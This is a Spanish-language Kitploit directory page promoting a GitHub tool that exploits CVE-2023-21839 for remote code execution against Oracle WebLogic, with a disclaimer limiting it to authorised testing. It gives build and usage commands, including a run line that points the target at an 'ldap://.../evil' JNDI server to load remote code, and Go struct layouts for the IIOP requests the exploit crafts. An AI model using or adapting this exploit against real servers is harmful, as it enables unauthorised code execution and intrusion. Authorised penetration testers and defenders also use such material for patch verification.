Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-21839 — Weblogic CVE-2023-21839 RCE (sin dependencia de Java, RCE con un clic) | Kitploit
Herramientas/GitHubGitHub/askyeye/cve-2023-21839
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónDesarrollo de Payloads
GitHubaskyeye/cve-2023-21839

CVE-2023-21839

Weblogic CVE-2023-21839 RCE (sin dependencia de Java, RCE con un clic)

Ver Repositorio
115107hace 10 díasRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-21839

El uso no autorizado de este proyecto para atacar o probar objetivos es ilegal. Este programa debe usarse únicamente para fines de prueba de seguridad e investigación autorizados.

Introducción

Weblogic CVE-2023-21839 RCE

(1) No requiere ninguna dependencia de Java, construye el protocolo a través de socket directamente para RCE

(2) Se ha resuelto el problema de red NAT de IIOP (se pueden probar objetivos Docker y públicos)

(3) Probado en Windows/Mac OS/Linux y Weblogic 12/14

(4) Utilice JDK 8u191 o inferior para iniciar Weblogic y configure su propio servidor JNDI

Uso

root@kitploit:~
cd cmd
go build -o CVE-2023-21839
./CVE-2023-21839 -ip 127.0.0.1 -port 7001 -ldap ldap://127.0.0.1:1389/evil

Otros

Locate Request

root@kitploit:~
type LocateRequest struct {
	Header            *Header
	RequestId         []byte // 4
	TargetAddress     []byte // 2
	_reserved         []byte // 2
	_keyAddressLength []byte // 4
	KeyAddress        []byte // _keyAddressLength
}

Resolve Request

root@kitploit:~
type ResolveRequest struct {
	Header             *Header
	RequestId          []byte // 4
	ResponseFlags      []byte // 1
	_reserved1         []byte // 3
	TargetAddress      []byte // 2
	_reserved2         []byte // 2
	_keyAddressLength  []byte // 4
	KeyAddress         []byte // _keyAddressLength
	_operationLength   []byte // 4
	RequestOperation   []byte // _operationLength
	_reserved3         []byte // 1
	ServiceContextList *ServiceContextList
	CosNamingDissector []byte // no limit
}

Rebind Request

root@kitploit:~
type RebindRequest struct {
	Header             *Header
	RequestId          []byte // 4
	ResponseFlags      []byte // 1
	_reserved1         []byte // 3
	TargetAddress      []byte // 2
	_reserved2         []byte // 2
	_keyAddressLength  []byte // 4
	KeyAddress         []byte // _keyAddressLength
	_operationLength   []byte // 4
	RequestOperation   []byte // _operationLength
	_reserved3         []byte // 2
	ServiceContextList *ServiceContextList
	StubData           []byte // no limit
}
Descargar herramienta